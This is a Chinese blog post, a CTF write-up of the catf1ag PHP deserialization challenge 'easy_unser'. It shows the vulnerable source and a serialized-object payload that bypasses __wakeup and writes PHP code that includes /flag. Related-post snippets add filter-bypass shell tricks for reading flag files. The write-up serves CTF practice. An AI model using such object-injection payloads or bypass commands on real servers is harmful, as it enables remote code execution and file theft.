catf1ag [两小时AK赛] - WEB - easy_unser

最新推荐文章于 2024-04-26 21:58:37 发布
最新推荐文章于 2024-04-26 21:58:37 发布
阅读量644 收藏
点赞数 4
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56051888/article/details/124722081
版权 

<?php
//flag in /flag
show_source('./index.php');
class catf1ag{
    public $target='flag';
    function __wakeup(){
        $this->target = "catf1ag is CTF platform!";
    }
    function __destruct(){
        $fp = fopen("catf1ag.php","w");
        fputs($fp,$this->target);
        fclose($fp);
    }
}
$a = $_GET['catf1ag'];
$b = unserialize($a);   //运行该unserialize()前会先执行function __wakeup()
include 'catf1ag.php';

?>

以下解题思路是小白本人自己的理解,如有错误请指正。

从所给代码中可以看出:1、进行了反序列;2、注释中提示flag在/flag文件中;3、catf1ag类需要有$target和$fp两个参数。

所以根据反序列写URL代码:

?catf1ag=O:7:"catf1ag":2:{s:6:"target";s:26:"<?php include('/flag'); ?>"}

即能得到flag

 

小锅安全小试
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
天权信安杯 catf1ag CTF 2022 题目
12-09
天权信安杯 catf1ag CTF 2022 题目。除了Web,其他类型的题目基本上都下载了。
2020Xpoint新生杯(部分题writeup)
weixin_46938584的博客
11-11 1312
真签到 扫二维码回复信息得到flag。 假的签到 1、提示robots.txt。 2、又提示进入phpp_tql.php,得到如下源码。 <?php highlight_file(__FILE__); $phpp=$_GET['phpp']; $hphh=$_GET['hphh']; if (md5($phpp)===md5($hphh) and $phpp!==$hphh ){ highlight_file('flag.php'); }else{ echo 'PHP 彳亍'."
命令行解析:flag
c359719435的专栏
12-12 1916
一般使用在写命令行程序(工具、server)时,对命令参数进行解析是常见的需求。Go的命令行参数解析通过flag包实现,先看下面这个例子,假设我们实现了一个server,启动这个server的时候需要指定监听的tcp地址(例如:127.0.0.1:1314)、配置文件、监听的http地址(例如:127.0.0.1:6666)。启动命令如下: ./server -tcpAddr 127.0.0.1
Catf1agCTF——Web(刷题记录片)
最新发布
weixin_62074861的博客
04-26 381
Catf1agCTF——Web
catf1ag CTF刷题1(比较入门)
weixin_63231007的博客
05-09 902
1. 变量覆盖_extract _extract函数存在变量覆盖,因此再get传入_init_str=6即可满足条件 2. 等于False md5()函数存在漏洞,传入为数组时,会报错返回NULL值,满足==0 3. 啥都没了 主机关机了,以为啥都没了,没想到。。。肯定是备份考察 index.php.bak index.php.swp 发现.index.php.swp下载的文件里flag 4. 文件包含 题目说了是文件包含漏洞。发现?file=参数,查看源码得知flag所在文件.
1.30 刷题
Lumos427的博客
01-30 689
ctfshow web入门 命令执行 web37 //flag in flag.php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } }else{ highlight_file(__FILE__); } 这里用了include文件包含,代码不能直接执行
catf1ag web题目 WriteUp(wp)
Anton1a的博客
01-16 7705
catf1ag web题目 WriteUp
CatF MT4指标模板
09-28
1. **趋势追踪指标**:这类指标通常用于识别市场的总体方向,例如移动平均线(MA)、抛物转向指标(PSAR)或趋势线。在CatF模板中,它们可能被用来确认长期和短期的趋势,以便在正确的时机开立头寸。 2. **振荡器...
Linux系统下绕过某个关键字的小技巧,比如flag关键字
weixin_44632787的博客
07-24 2025
Linux系统下绕过某个关键字的小技巧,比如绕过flag关键字 首先先在linux系统下创建一个文件名为flag.txt的文件。里面的内容为:This is Flag! 这里提供几个绕过某个关键字的小技巧。 单引号绕过: cat fla’g’.txt 双引号绕过: cat fla"g".txt 反斜线绕过: cat f\lag.txt $+数字绕过: cat fl$1ag.txt,cat fl$2ag.txt,cat fl$3ag.txt $@绕过: cat fl$@ag.txt Base6
catf1ag 小时ak
zip471642048的博客
05-09 744
目录Crypto[小时AK] - CRYPTO - 怎么会多一个呢[小时AK] - CRYPTO - 高实在是高[小时AK] - CRYPTO - 栓qMisc[小时AK] - MISC - 签签[小时AK] - MISC - 奇怪的字符[小时AK] - MISC - 这4什么好看的 Crypto [小时AK] - CRYPTO - 怎么会多一个呢 yafu分解n可以分解出三个因子 import libnum import gmpy2 n=73551482761993440
catf1ag平台AK
weixin_53268624的博客
05-10 896
catf1ag AKwp
【DASCTF中北大学】EasyUnser PHP反序列化字符串逃逸
_Kisaragi_的博客
06-07 285
题目 <?php include_once 'flag.php'; highlight_file(__FILE__); // Security filtering function function filter($str){ return str_replace('secure', 'secured', $str); } class Hacker{ public $username = 'margin';
CTF——web个人总结
热门推荐
recover517的博客
05-28 1万+
包含个人总结的解题思路、注入思路、文件包含思路、源码审计思路等
CTF笔记 个人HNCTF反思(部分题目)
qq_51248658的博客
10-31 2092
[WEEK2]easy_include、[WEEK2]easy_unser、[WEEK2]easy_sql、[WEEK2]ez_SSTI、[WEEK4]pop子和pipi美
天权信安&catf1ag网络安全联合公开-AGCTFS战队 wp
akxnxbshai的博客
12-17 1210
病刚好,发个wp吧。
2022 SWPU新生&HNCTF web部分题目
weixin_63231007的博客
11-02 3224
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php
catf1ag Web中命令执行与Webshell详解
Aiwin的博客
05-10 1196
关于catflag平台中Webshell与无字符Webshell做题的记录
攻防世界--upload
qq_46263951的博客
01-09 713
这道题真是涨芝士了,原来文件名也能SQL注入... 这里应该是将文件名存到数据库中并返回到页面上显示出来 测试这里通过select时,字母无回显,十六进制无法使用,所以要使用十进制,并且要防止溢出 select、from被过滤,双写绕过 CONV(n,from_radix,to_radix):用于将n从from_radix进制转到to_radix进制substr(str,start,length):将str从start长度为length分割 hex(str):将str转成十六进制 payl
CTFHub 技能树rce
weixin_63231007的博客
05-18 1173
前言 最近临近期末考试了,所以打算抽取时间来复习一下高数,线代,不然就要挂科了😭 后面难一些的地方后面再继续练习学习。但是学习也不能停搁,周六学校的战队也要进行纳新面试了,因此那就借CTFHub技能树,综合做一下刚开始学习时的一些基础漏洞,也算是回顾复习一下🐱‍👤 (1) eval执行 eval()函数 eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行 <?php if (isset($_REQUEST['cmd'...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值